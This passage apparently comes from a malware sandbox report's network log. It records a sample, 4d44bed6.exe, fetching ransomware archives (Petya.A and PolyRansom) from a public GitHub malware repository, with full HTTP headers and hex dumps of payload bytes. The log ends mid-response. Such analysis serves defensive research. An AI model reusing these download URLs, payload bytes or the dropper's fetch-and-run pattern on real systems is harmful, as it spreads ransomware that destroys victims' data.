                                                                                                                                                2022-09-29 12:51:24 UTC2033INData Raw: 43 a5 9d 15 f3 2e ed f5 51 96 f5 73 7b c4 00 44 56 8a 93 e2 fb a6 4f 10 8b 14 e2 e8 54 79 d5 a8 b7 a4 96 f5 0a 04 44 f2 81 6a af 13 8b 9b 08 eb 45 62 3e 2f 6f 34 8f e0 e1 f7 e7 c8 f0 4f cc 19 39 16 c0 ff 19 37 e8 3a 17 cf 8f af d3 e7 02 4b 98 3b 81 ce 34 de 6e e3 4d f4 af 46 4c a2 a7 3b 5b 4a 79 17 51 53 5c 34 3f 15 7f 39 b1 b8 1b e5 63 a3 aa 94 6d 94 a4 fc b9 9d ce 3a 42 a2 9b 24 f8 ec 49 5e e1 1a 87 81 4f d1 62 b2 b8 d3 b2 4e 1f e5 c1 a0 fe 97 8b 38 dc 5a 8f fb c4 8a dd 98 bc d0 89 1c 1c da cd cf 1b d5 33 cd 00 63 b4 61 24 ae 84 47 af 95 86 10 06 19 c8 ef d5 3c df 9b 96 c0 fe 55 59 b1 f1 f2 04 d5 b1 2a 82 80 cf 75 43 d7 6a b3 de 06 46 72 0f 9b 5f 00 66 2b 3c 87 3c fd 63 55 50 37 1d 27 20 4b b9 57 8c cd 1b e2 5e 9a 08 d7 b8 d7 9c 65 49 61 d1 04 62 b7 5d
                                                                                                                                                Data Ascii: C.Qs{DVOTyDjEb>/o4O97:K;4nMFL;[JyQS\4?9cm:B$I^ObN8Z3ca$G<UY*uCjFr_f+<<cUP7' KW^eIab]
                                                                                                                                                2022-09-29 12:51:24 UTC2049INData Raw: 7f 17 28 44 8d 85 c6 15 cd dc 4e 87 4e 1a 27 d4 6b 30 ac b3 eb aa 2b d1 4c 78 d1 a9 8a f3 6a ca e8 86 07 c5 c0 1a 7a 64 cd cc ac b2 7c 82 d7 83 24 53 ab 27 69 60 dd 37 df 5a db 2f 6c 35 95 67 26 c3 2f 1c 33 63 5e 31 a5 58 86 b9 88 6b db 89 53 fd ee fe 7b 7b 28 2f 22 47 b6 72 24 ea 19 2b 85 82 ab 51 77 f2 1f 4b 01 b9 75 57 de 21 aa 73 92 ff d1 14 66 6d 97 8c 33 49 a3 86 85 67 06 1c 18 a3 65 57 ab a6 51 67 66 bb 26 55 4d a5 90 9a 89 11 66 bd 61 bc 4a eb 39 99 bf dd 3a f2 7b 35 b9 20 99 dc 68 54 a5 7c 0f df 4d be b4 07 03 8c 5e 94 5d 03 6c 5f e8 85 e1 a2 9b 27 36 77 55 4e d4 18 62 bc 23 db 63 5d 46 2b 15 92 ac 83 72 c4 4b b3 e4 ba a6 f5 68 8c 91 71 35 d8 8f a3 f3 87 14 d7 2f 3d 97 c0 8a 68 4a 75 50 73 d7 64 3f e8 7a 23 1a c2 13 af da 2e b0 16 d4 91 b1 53 9d
                                                                                                                                                Data Ascii: (DNN'k0+Lxjzd|$S'i`7Z/l5g&/3c^1XkS{{(/"Gr$+QwKuW!sfm3IgeWQgf&UMfaJ9:{5 hT|M^]l_'6wUNb#c]F+rKhq5/=hJuPsd?z#.S
                                                                                                                                                2022-09-29 12:51:24 UTC2065INData Raw: d1 cf f8 66 06 bb 43 98 f0 ea e4 06 f1 3a e9 d2 28 f1 e9 e1 9a c0 df bd 3d 79 cd b0 90 b0 53 69 33 cb 76 a9 b0 42 78 d1 8e c1 69 a4 7a 6e 2a 16 ac 87 dc 0a 4e 55 44 95 2d ac 63 f8 79 c5 a0 3b b4 74 cf b0 b9 ac cd 36 1d 58 a8 bf 8d 05 73 37 36 be bf 63 b4 e4 ee 4c b8 55 92 fc 35 cf 67 83 59 0e a2 8b 0e a6 6f e7 b8 88 71 0c a3 f4 db 8c 3a 84 d2 a7 d6 f2 35 fb cb 9e f8 8c 44 4b a0 ac c8 ac 14 97 53 1f ab c1 8e 01 0c af 10 77 54 b9 7e e2 05 84 8e 4c ed 5f 0f 75 bf 65 8f f2 65 98 c3 29 df 06 fc f6 89 e9 a5 9d cd d1 da 78 59 68 be 0f 3f 39 ea 22 e9 9a b2 ad 9f ca 91 c5 98 f3 b0 12 43 22 3e e8 ac 0a ba ca 08 4b cc f4 f0 d6 a5 a7 14 62 14 f3 22 41 e3 18 54 0a 0d 67 fd 36 61 72 04 31 a6 57 e4 8c 86 32 74 2b 35 ca 55 46 3b 4e 50 3c e0 2b cf 58 d0 0a 14 c4 72 9d f3
                                                                                                                                                Data Ascii: fC:(=ySi3vBxizn*NUD-cy;t6Xs76cLU5gYoq:5DKSwT~L_uee)xYh?9"C">Kb"ATg6ar1W2t+5UF;NP<+Xr
                                                                                                                                                2022-09-29 12:51:24 UTC2075INData Raw: 63 56 c2 e0 47 27 1f ec 8f 02 5c 11 2c d1 98 6c 85 93 7d d3 ba 94 f9 7f ee 87 47 b7 28 56 f8 6f fb 42 aa 3b 2a 5a 03 e3 69 b7 e0 e7 0c 00 78 13 be a9 a4 d4 9b 0b 2d d5 37 97 02 22 92 80 40 6b be 54 59 de ed 49 80 5c 29 d1 24 6c ee af 4d c3 a9 1c 4a 2d cb f3 fd 65 64 bd 1e c0 64 db 60 62 0b a2 9b 70 57 49 57 dc aa 57 74 d6 53 57 35 ef 0b dd 4b fc 4e 3a d7 99 c1 cb 30 d6 1c 19 5c ab e1 82 9c 81 5c d8 4f 22 58 1b 97 84 b7 af 57 3b 91 75 51 7c ca 23 0f 99 5a 0b 55 0c 35 77 f5 47 69 25 c5 fb de 63 1e 2b 27 a3 00 1d 78 48 b0 65 33 62 60 8f 9b f3 9b ce 6f ad 0c 7c 0b 31 f2 14 7f fb 49 1a 67 97 50 44 6f c7 e8 7a 01 a3 9e 27 52 f3 5d 53 40 dd f8 c2 bc 29 3e c4 09 e5 7e 5c 92 7d af 44 fd 25 b9 ab 01 8c 84 d1 30 36 f5 d9 37 ba 07 02 89 c6 f3 75 a0 1e f0 f9 32 12 35
                                                                                                                                                Data Ascii: cVG'\,l}G(VoB;*Zix-7"@kTYI\)$lMJ-edd`bpWIWWtSW5KN:0\\O"XW;uQ|#ZU5wGi%c+'xHe3b`o|1IgPDoz'R]S@)>~\}D%067u25
                                                                                                                                                2022-09-29 12:51:24 UTC2091INData Raw: 97 5a 34 60 65 be ce f3 9c 07 b5 0b aa 60 28 1b dd 1d 3d c9 1d 05 9c 8a 2c cb e8 a7 1a 45 68 08 01 b1 32 ce 60 fc be 23 4c 52 77 a4 3f 15 20 11 ee b4 c5 96 f6 10 e9 4a 85 fe 01 58 ac 1c c9 24 3d 8e 20 03 bc 2b 41 ee c2 8d 47 d7 1f af b5 6b 87 9a d5 9d 3a 6a 96 6b 36 d6 a6 10 a8 5d 11 2b 12 16 1b 8e 15 17 79 ea 3e 3a 08 4f c6 fd eb a7 0f 05 2f 2a 44 70 f3 b8 10 38 e2 72 67 de d7 49 4c 1f 2d f8 c9 15 56 3e bf 82 0d db b7 18 5a 1c 41 78 53 17 a0 0e 32 b8 16 05 01 9a 74 27 de 78 95 19 e7 51 40 25 e5 ee 63 b8 d9 d1 c0 cf 7f 54 e5 fc fa a4 4a ad 00 67 82 bd 87 17 42 4d 9f 1f c6 98 78 e5 56 0f d9 f0 cb a7 b1 6b 81 f4 84 28 57 2f bc 3c ef aa 20 96 b0 c5 0d c4 05 45 c4 5f 53 34 91 af f3 ff fb 2e 7a a3 34 ab 29 99 84 ac be ed 7f 95 94 4a 8c 61 f0 c5 c8 5d db 14 36
                                                                                                                                                Data Ascii: Z4`e`(=,Eh2`#LRw? JX$= +AGk:jk6]+y>:O/*Dp8rgIL-V>ZAxS2t'xQ@%cTJgBMxVk(W/< E_S4.z4)Ja]6


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                16192.168.2.549716140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:24 UTC2099OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:24 UTC2099INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:15 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:24 UTC2100INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                17192.168.2.549717185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:24 UTC2102OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:24 UTC2102INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 131293
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "db31807bd0d2739f220f59cdf06ed3d47d3bb4373e6414156d7274ec658e5f22"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 3596:11E0C:3901A7:400694:63359347
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:24 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6945-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455885.627447,VS0,VE291
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: e114e839f748c2e1103ed017b20b79beedfcd804
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:24 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:24 UTC2102INData Raw: 50 4b 03 04 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 c5 69 3f 6d 6a b3 50 f6 03 c1 1a b8 f7 06 bc e8 4e e6 64 7c d2 a2 19 04 df 3e cc 63 7f ad 0d ab 2e 25 b6 c6 4e e4 92 f1 e3 de 02 49 83 18 f7 d9 37 7b e4 46 02 4f c1 d9 09 32 0e 77 54 3a f4 c7 82 67 94 d7 eb 64 67 0d b0 e3 80 9f 7b 94 5f 3a 03 b2 8d ed 60 1a ae e3 cf fd 4c cd b0 e9 b7 a8 f8 6a 52 b8 30 81 64 2c ae 01 f2 35 09 de 93 21 a8 1d ba de 2a 75 36 e3 0e a5 4e b8 6e 38 89 e0 52 ef 05 7b 9e 64 0a dc 0b 7c db 7b bc c0 03 b2 b3 90 ab 1b 0e 5b 9f dc bb d2 04 05 79 0b 66 e5 e5 21 c3 66 ae 41 c6 e9 c6 e8 94 83 82 0c 16 c0 97 6e 6c a7 bd ab 7d f0 b9 d5 df 40 de 8d 1b 1f 06 bc 58 c6 85 8d f0 0d 36 bb 05
                                                                                                                                                Data Ascii: PKtIwH+Endermanch@Petya.A.exei?mjPNd|>c.%NI7{FO2wT:gdg{_:`LjR0d,5!*u6Nn8R{d|{[yf!fAnl}@X6
                                                                                                                                                2022-09-29 12:51:24 UTC2118INData Raw: e3 03 fc 3b 3f e2 b5 58 26 d3 67 a6 ec a6 12 cf 6c 6f 02 9a d6 95 58 01 ae ce 13 2f c2 8c 59 0f 74 14 c6 2a 51 00 2e 42 eb ac b5 04 92 cb 16 ed b9 92 62 db f4 0c 49 d3 a0 79 c5 56 e9 2a 2c 3a 14 43 16 cd eb 11 82 f9 24 e4 29 80 6e 81 74 41 76 1b 0f 65 45 57 1b 51 54 a3 ca 45 c4 90 19 13 ec 1d 35 6a b2 bc ca 3f c3 64 e8 de 69 be b4 f4 4d 6d 61 d3 2a 02 9f 1a 6d 3e 82 b7 63 8f 5f 55 a5 c0 fb cb c0 97 f1 de 98 59 c5 39 d1 f9 b9 8d 1a 50 eb b0 17 33 01 b6 6b a7 4e c7 70 fb d8 d4 84 fe 36 d1 b1 6c 60 63 13 cd 0a f2 97 af 8a db 48 95 d5 8f fc 1b c7 a0 70 4b 64 2f 06 f2 f9 0f 15 97 67 c7 46 8e db 81 3c ff 9d e6 d0 2a 65 90 45 57 f9 02 75 49 f9 f6 b2 2d c1 a9 87 7c c8 9f bc 23 da fe 19 57 92 32 84 40 95 5e 59 f3 8b 2d 5b c8 c8 83 06 51 89 74 3e 77 b9 39 01 80 57
                                                                                                                                                Data Ascii: ;?X&gloX/Yt*Q.BbIyV*,:C$)ntAveEWQTE5j?diMma*m>c_UY9P3kNp6l`cHpKd/gF<*eEWuI-|#W2@^Y-[Qt>w9W
                                                                                                                                                2022-09-29 12:51:24 UTC2134INData Raw: f6 fa 35 99 c0 32 e3 e1 14 6d 4e 54 e7 a4 ec 0e eb 92 50 f9 59 62 f0 4e 44 b6 54 dc f6 19 c0 93 0a 46 da 99 92 df fb 84 ce 21 a9 3c 7b 16 8e 80 f6 91 38 93 7a d1 27 5f d8 85 87 84 8f 0f cf 68 b5 11 45 99 88 e1 0f 28 1a b8 23 01 78 a9 ad 5e d5 df 35 0f e1 23 f6 6a 83 4c f1 1b 93 f9 22 aa 6a ef fd 4b 07 fe 4a 8a d4 7b 06 e5 9f 6e 97 ac 25 8f 9c d5 23 55 72 e0 ac bb e1 00 a4 6c 83 d0 16 8c d2 87 e8 df ad 90 3c 9e e6 3b 3c d0 7f a1 ac 4f df f9 a1 90 54 db 0d 42 a0 84 21 2d 66 db bf 1b cb 85 6b 5c 2c 6c 27 e2 bf b6 37 f0 86 67 b2 e8 bd 56 5c 74 b0 e1 97 0d 28 e8 78 6c 54 83 1f f6 45 c6 20 56 49 06 4d f0 49 f9 86 1c e3 e4 52 98 85 69 d9 cf 2d d3 2b 2d 87 1a 76 fe 44 d2 ce cf 61 3e 18 6f 01 6b 3f 10 5e d7 46 64 6e 2e 79 ab 1f e2 b9 03 1b 45 2a 29 bf 61 19 c8 a5
                                                                                                                                                Data Ascii: 52mNTPYbNDTF!<{8z'_hE(#x^5#jL"jKJ{n%#Url<;<OTB!-fk\,l'7gV\t(xlTE VIMIRi-+-vDa>ok?^Fdn.yE*)a
                                                                                                                                                2022-09-29 12:51:24 UTC2150INData Raw: 45 80 44 59 83 bb 64 55 54 24 80 63 0c 30 d3 d9 80 d1 99 40 74 4d 8c aa af 46 49 b7 45 ea 0a a0 74 cb a5 88 f3 98 91 32 8f 5b a5 99 da bd 56 e0 48 d4 04 88 54 47 c0 31 f8 2d 8c ef 37 2f 22 15 95 df 18 f1 a4 69 70 8c ab fd 9c bf 13 e7 45 43 fe 7e 76 e4 27 e6 bd bb f7 cb 46 fc 34 82 b5 d8 86 8b e1 74 9f f0 56 20 21 06 b9 de 77 1c 43 d7 36 4a 61 26 e3 dc a9 19 16 de 70 a1 a2 8b 93 f6 e2 3c ed 8b ff 44 20 29 17 70 2c d1 90 79 e8 24 f5 1b 0b 39 a8 9c dc 92 fc 8c ce 99 47 f6 c8 a9 0d 34 5a 0c 53 cf 1c 5f f5 91 fd 01 1e ae fc 22 5f cc ea ac bf 6f 68 45 a9 3a 32 16 25 8f 1a ec e9 6c 97 bd 88 d1 a2 f5 a2 84 67 1e 6b be b3 d5 f2 c0 4d f2 a2 0d f1 c7 d3 9b 35 f4 45 ae a4 90 6d 0f 95 79 f2 bc e2 0c 18 f3 5c ee 8c 1a 84 a6 48 d5 4f b0 84 cd 46 97 bb a2 61 01 3c 5b 0e
                                                                                                                                                Data Ascii: EDYdUT$c0@tMFIEt2[VHTG1-7/"ipEC~v'F4tV !wC6Ja&p<D )p,y$9G4ZS_"_ohE:2%lgkM5Emy\HOFa<[
                                                                                                                                                2022-09-29 12:51:24 UTC2166INData Raw: c8 db ff fd e3 5d 93 6b a6 43 4e b0 97 78 3b 25 a7 15 3a 03 e3 8c 10 2c 4d dd f2 ea a5 25 c1 d4 3d e3 85 8b 41 35 0c df 06 87 a9 08 d5 6b cc 56 3c e5 14 16 5d 41 6c 22 a6 1b 77 a6 d2 c3 d6 26 05 21 77 70 9a 40 21 ff 27 a6 77 4e 46 ae f0 d7 fb 4f b8 9e f8 f3 8e 95 39 54 d3 7b 95 95 4e 1a 9f 76 02 ea 87 2a fa 56 79 23 45 e0 b2 36 d0 e9 68 24 d8 16 9f 8c 0f 14 b0 17 29 44 86 9f d2 4a fd 95 56 de e6 dc 80 2a 41 51 d4 fc d7 93 72 14 7c 02 67 72 78 ff 78 0d 44 b6 e1 00 c4 48 4f 7f 06 57 07 1c 17 fa bd 43 b8 27 2e 0f 71 1f 55 7c ba 83 75 5d b2 97 50 e4 f6 95 07 9f f2 b3 14 01 06 90 9a 20 35 d7 7b e0 7f 49 5b c6 05 7b 74 cc 64 2b 37 26 19 f0 f9 9c 1b 4b a5 a8 fb 66 16 b0 7c 27 63 0f ff 5f d9 28 9a b9 bf 71 6b 44 7c 69 c6 2e cc 82 b6 5c 69 89 1e 46 6d 71 44 3b 22
                                                                                                                                                Data Ascii: ]kCNx;%:,M%=A5kV<]Al"w&!wp@!'wNFO9T{Nv*Vy#E6h$)DJV*AQr|grxxDHOWC'.qU|u]P 5{I[{td+7&Kf|'c_(qkD|i.\iFmqD;"
                                                                                                                                                2022-09-29 12:51:24 UTC2182INData Raw: d7 17 95 9c 1e b8 8f b1 25 4b 59 d8 41 52 ff f4 18 4f 61 2c 75 4e 6c 69 7b 77 7b 6d 55 09 82 c6 57 e1 74 81 7e c9 9b 8f e9 b3 4c f8 f3 2d 70 22 a4 06 15 54 2b 0b 65 19 db de 48 fc a2 34 03 0c 54 a5 92 1f 8a 9c 52 95 e2 0e 3e f6 d5 5b 28 9f 86 e3 8b a1 39 1e fc 6f 18 bf 12 81 8e cf a0 95 53 2c e1 01 75 c4 1f 15 23 03 c1 a2 e5 47 1a c0 82 dc a6 b0 81 d8 f4 25 f9 b9 1e bb 5e 05 02 49 bb 97 e7 6f 2d dc 0d 6f 05 9c ed f7 82 0f 1a f1 f5 ed 68 b3 e5 39 54 89 25 c3 21 1b f6 04 ee d9 20 af 0e 77 80 9a 16 78 98 f6 1a 1c d8 d2 25 c9 d0 6e 5b a7 c9 4a 01 18 d9 e5 6f 11 ed 69 07 d0 1c a4 8a ae c1 c4 73 42 18 04 60 2f 9d 2c 0e ff 91 47 d7 28 92 8e 96 39 78 5d b2 ad d8 7e 62 36 4b 4f 6c f7 72 5d ad 7c 7c a1 76 ce 80 0a 16 1e db fd dc 9d e2 8c c5 ec 3c e3 55 24 11 2f 80
                                                                                                                                                Data Ascii: %KYAROa,uNli{w{mUWt~L-p"T+eH4TR>[(9oS,u#G%^Io-oh9T%! wx%n[JoisB`/,G(9x]~b6KOlr]||v<U$/
                                                                                                                                                2022-09-29 12:51:24 UTC2198INData Raw: df c1 76 f4 35 bb 04 25 57 c2 ab 00 8c e1 70 4c 84 d5 c3 45 e2 fb 55 67 38 f6 5a 09 06 3b c9 1c 17 74 72 22 a9 3d 55 9e 05 b9 11 70 d4 49 44 d8 87 53 a1 db 91 c6 c3 65 8f 8d 0f 49 8d 45 df da b2 0c 24 6a 6c db 7a c1 95 31 77 f3 25 4c 59 a3 4e d9 31 2f 04 41 ee ea b3 60 d1 34 ec e2 b8 6a 2f 9c 4e b7 fb 92 13 ba e2 b5 c4 a8 12 f9 4a 73 03 c5 c6 ed c9 c4 e7 d8 f5 0e 1c 4a b4 a0 31 ea 11 bb 05 db cd 09 fa 3a d2 02 89 e1 a7 d7 e9 d8 36 8d 6d f5 ae 4e 6c a0 e7 3c 02 64 04 4a 70 e0 34 15 d1 ed a8 9d 8a 1f 2c 54 03 a9 99 94 1c 02 ac 38 a7 49 3c 35 87 3c 6f 21 ac 28 85 a2 cb 2b ef 77 24 03 52 4d bb fe 2d 0c c1 c4 55 36 8f ab 07 4b e7 6d d9 f4 05 69 da 13 a9 a2 66 e3 f5 a0 74 91 fa 6c 26 36 2d 60 2d aa 38 9b be 4b 6d 35 10 9d 07 8b 81 ad 2f bd de 28 9e 93 33 d6 8b
                                                                                                                                                Data Ascii: v5%WpLEUg8Z;tr"=UpIDSeIE$jlz1w%LYN1/A`4j/NJsJ1:6mNl<dJp4,T8I<5<o!(+w$RM-U6Kmiftl&6-`-8Km5/(3
                                                                                                                                                2022-09-29 12:51:24 UTC2214INData Raw: b9 56 9d 0d 0d ca 9f 7e 8e 82 ab 25 44 e4 0c fa af 3e 0d 0e ef f6 8f ff fc be 74 b1 11 8f 1c 4f ae 93 cb 60 2d 12 f2 11 e1 dc a2 fb 29 39 4e b5 69 13 1a 7d 37 ee f6 91 7e 91 e5 af b6 13 c9 70 e3 3f bb 6b 0a 1f f2 df 0c 04 c1 4a dd 48 f8 00 29 95 91 70 e7 a6 bf 8d d8 c7 c4 84 37 d0 11 76 ba 6c df 40 bb 38 27 71 bf 85 6c 3d 01 e5 a9 3c d7 a7 55 14 99 f1 1d c8 22 5f b3 6b 75 c9 fc 1e 2c 0c 7e 31 d6 80 95 d1 dc dd 59 28 f0 cd 56 da c6 3a b8 68 21 ce c4 ae bc 3a 67 08 bf d4 58 68 d3 87 72 0c 3c 8c 28 bf fb 3b 06 ed c9 3a c0 bc 0e fc 81 06 2e c2 05 35 78 3f d2 62 cb 5c 7c 52 2f f6 11 e7 3c f6 bb 84 7a c7 06 39 ec 98 4e ee 80 04 cb 1c 63 35 4b 21 4d 7c 55 a3 77 53 e2 13 c9 14 72 6e c1 9f c4 ca c1 c7 65 4a d6 04 32 ed 9e 30 d3 8d 80 de 56 31 63 ad a0 78 4d de 34
                                                                                                                                                Data Ascii: V~%D>tO`-)9Ni}7~p?kJH)p7vl@8'ql=<U"_ku,~1Y(V:h!:gXhr<(;:.5x?b\|R/<z9Nc5K!M|UwSrneJ20V1cxM4
                                                                                                                                                2022-09-29 12:51:24 UTC2230INData Raw: 7d 2f cf 2b 66 5e e7 fd f6 04 2d e1 2e c3 2e a3 6f 68 07 35 be 01 71 49 6b 98 ae 0b 35 0c 3e bc 4b e2 9a 59 87 ed 3d 0b f5 41 9b 6d 5f 41 eb 41 ed 67 44 91 99 2c c9 e2 22 b4 ee 16 b9 d3 0c ca 0d c0 55 a2 18 2b 51 3b 0b f8 34 68 e6 9b 47 58 cf 62 c2 31 87 eb fe f1 c1 82 3f 75 4d da 24 50 4b 01 02 3f 00 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 24 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 65 92 e4 b8 e8 f6 d1 01 2a d0 df e4 e7 9d d4 01 10 ba de e4 e7 9d d4 01 50 4b 05 06 00 00 00 00 01 00 01 00 68 00 00 00 5f 00 02 00 00 00
                                                                                                                                                Data Ascii: }/+f^-..oh5qIk5>KY=Am_AAgD,"U+Q;4hGXb1?uM$PK?tIwH+$ Endermanch@Petya.A.exe e*PKh_


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                18192.168.2.549718140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:25 UTC2231OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:25 UTC2231INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:15 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:25 UTC2231INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                19192.168.2.549719185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:25 UTC2233OUTGET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:25 UTC2233INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 133759
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "c0c6af3e39ace2d58d00154f6e809181a5c813ca80bbf20f38837a99f8056014"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0800:540D:F52AAF:104AFB9:63359348
                                                                                                                                                Accept-Ranges: bytes
